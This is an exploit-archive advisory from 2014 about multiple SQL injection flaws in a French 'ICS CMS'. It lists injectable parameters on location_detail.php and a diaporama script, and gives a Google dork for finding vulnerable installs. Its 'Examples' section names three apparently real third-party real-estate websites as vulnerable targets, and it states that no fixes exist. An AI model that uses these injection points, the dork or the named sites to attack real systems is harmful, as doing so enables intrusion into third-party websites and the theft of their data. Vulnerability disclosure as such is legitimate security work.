ICS CMS <= Multiple SQL Injection Vulnerabilities

2014-05-02 15:29:05
Posted by: Daisuke Dan

#####################################################
#ICS CMS <= Multiple SQL Injection Vulnerabilities #
#####################################################

# Exploit Title: ICS CMS <= Multiple SQL Injection Vulnerabilities
# Google Dork: intext:"powered by ICS" warning mysql inurl:"id="
# Date: 15-12-2013
# Exploit Author: Daisuke
# Vendor Homepage: http://www.ics.fr/accueil/accueil.php
# Software Link: http://www.ics.fr/produits/produits.php
# Version: Not Found
# Tested on: Windows Seven

=First SQL Injection Vulnerability=

http://localhost/location_detail.php?id=1000060&table=appartement&pagephoto=[Injection]

=Second SQL Injection Vulnerability=

http://localhost/location_detail.php?id=[Injection]

=Third SQL Injection Vulnerability=

http://localhost/include/php/diaporama2.php

=Examples=

http://www.orimnice.fr/location_detail.php?id=1000060&table=appartement&pagephoto=0

http://www.agence-baumann.com/location_detail.php?id=0000243&table=appartement&pagephoto=0

http://www.immo-zimmermann.com/location_detail.php?id=0000144&table=appartement&pagephoto=-10

Fixes

No fixes

In order to submit a new fix you need to be registered.